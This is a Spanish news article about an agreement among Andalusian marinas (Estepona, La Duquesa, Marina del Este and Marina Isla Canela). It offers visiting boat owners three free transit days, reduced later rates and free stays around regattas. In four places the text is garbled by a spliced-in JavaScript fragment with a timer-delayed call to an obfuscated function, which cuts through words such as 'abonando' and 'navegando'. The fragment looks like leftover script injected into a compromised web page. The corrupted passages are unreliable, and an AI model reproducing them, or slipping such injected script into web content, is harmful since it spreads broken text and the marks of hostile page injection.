- Los clientes del Puerto de La Duquesa, Puerto Deportivo de Estepona y Marina del Este podrán beneficiarse de los tres primeros días de tránsito gratis en Marina Isla Canela, abonandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando únicamente las tasas portuarias correspondientes.
- Otra de las ventajas es que los barcos que se encuentren en competiciones organizadas por algunos de los puertos acogidos al acuerdo podrán estar tres días antes y tres días después de las pruebas sin coste.
Marinas del Mediterráneo, entidad que integra a las empresas concesionarias de los puertos deportivos de Estepona, La Duquesa (Manilva) y Marina del Este (Almuñécar) y Marina Isla Canela han firmado un convenio de correspondencia por el cual ambas partes se comprometen a ofrecer condiciones especiales y preferentes a los clientes de contratos de base y propietarios de amarres de los puertos firmantes.
De este modo, los clientes de los puertos suscriptores del acuerdo se beneficiarán de los tres primeros días de tránsito gratis en los costes, abonandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando únicamente las tasas portuarias correspondientes. En el caso de que quieran permanecer más tiempo, los dos días siguientes abonarán el 50 por ciento de las tarifas del puerto receptor más las tasas portuarias.
Además, los clientes visitantes, por su parte, gozarán de los mismos derechos y obligaciones que los del puerto receptor, pudiendo utilizar todos los servicios que ofrezca el mismo, en idénticas condiciones.
Otra de las partes del convenio establece que los barcos que se encuentren en competiciones de regatas organizadas por alguno de los puertos firmantes podrán estar hasta un máximo de tres días antes y tres días después de las pruebas sin coste.
Se trata de una magnífica oportunidad para que los usuarios de los puertos deportivos del Grupo Marinas del Mediterráneo aprovechen la ocasión para conocer Marina Isla Canela. Un puerto singular ubicado en la localidad de Ayamonte, Huelva, concretamente en la desembocadura del río Carreras, en el interior del paraje natural de Isla Canela. Es el último puerto español antes de seguir navegandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando al Algarve Portugués.
Para Manuel Raigón, director general de Marinas del Mediterráneo, “la firma de este acuerdo supone seguir brindandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando a nuestros clientes un valor añadido a nuestros servicios, ofreciendo condiciones beneficiosas para que disfruten de la vida marítima y la posibilidad de conocer otros puertos”.